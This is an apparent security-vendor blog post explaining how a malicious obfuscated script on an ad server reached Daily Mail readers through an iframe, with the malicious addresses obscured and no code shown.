Last night, The Register asked us to look into a reader tip in regard to the website of the Daily Mail newspaper.

While doing an initial investigation I may have not been clear as to what was happening - this blog should clear up any misunderstanding.

Investigating the affected website initially I could see nothing untoward. However, the site did have links to lots of other websites and it contained several advert related links.

Investigating further on a goat machine which has an aggressively logging webproxy, I was able to see suspicious behaviour.

At the beginning Internet Explorer loads its default homepage and then I access the affected webpage.

After half a dozen refreshes I was able to see the following. (Note that I am obscuring the malicious webpages.)

The last few IPs are known to SophosLabs as having hosted malware in the past.

So what is happening here?

The Daily Mail is loading adverts from various sites.

One of those adverts site is loading the malicious IP.

Initially, the finger of suspicion pointed at the sites preceding the bad IP. However, further investigation showed that the site anm.co.uk was hosting the malicious code and legitimate adverts. Going to one of the bad adverts I saw a legitimate advert and when I viewed the source code:

As you can see from the above image this page references bs.serving-sys.com and has an obfuscated script on it. This script is detected by Sophos as Mal/ObfJS-BI in the WS1000. When the obfuscated script is decoded it loads the malicious IP via an iframe.